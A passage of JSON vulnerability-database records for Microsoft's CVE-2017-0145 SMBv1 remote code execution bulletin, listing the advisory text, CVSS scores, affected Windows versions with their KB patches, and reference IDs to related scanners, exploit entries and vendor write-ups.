"msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T00:58:24", "differentElements": ["msAffectedSoftware"], "edition": 60}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T08:49:10", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T08:49:10", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB4014077", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 61}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T10:51:44", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T10:51:44", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T10:51:44", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4014077", "KB4012216", "KB4012606", "KB3212646", "KB3177186", "KB4012213", "KB3205401", "KB4012598", "KB4012212", "KB3205409", "KB3210720", "KB4012217", "KB4012214", "KB3213986", "KB4013429", "KB4012215", "KB4013198", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": 